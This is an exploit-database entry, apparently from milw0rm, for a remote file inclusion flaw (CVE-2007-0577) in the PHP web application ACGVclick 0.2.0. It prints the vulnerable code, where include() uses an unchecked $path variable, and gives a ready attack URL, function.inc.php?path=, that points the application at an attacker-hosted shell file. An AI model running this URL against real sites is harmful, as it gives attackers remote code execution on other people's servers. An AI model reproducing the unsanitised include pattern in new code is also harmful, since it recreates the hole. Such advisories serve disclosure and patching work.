[] NeoSense

ACGVclick 0.2.0 - 'path' Remote File Inclusion

Author: ajann
type: webapps
platform: php
port: 
date_added: 2007-01-26 
date_updated:  
verified: 1 
codes: OSVDB-33002;CVE-2007-0577 
tags: 
aliases:  
screenshot_url:  
application_url: 

*******************************************************************************
# Title   :  ACGVclick <= 0.2.0 (path) Remote File Include Vulnerability
# Author  :  ajann
# Contact :  :(
# S.Page  :  http://acgv.free.fr
# $$      :  Free

*******************************************************************************
[[ERROR]]]
..
...
.....
<?
include($path."mysql.php");
include($path."aclick_connect.php");
$raf= new mysql_connection($hote,$login,$pass,$base);
?>
..
...
.....

[[ERROR]]]


[[RFI]]]

http://[target]/[path]//function.inc.php?path=[SHELL]

Example:

//function.inc.php?path=http://[target]/[path]/shell.x

[[/RFI]]

"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!

# milw0rm.com [2007-01-27]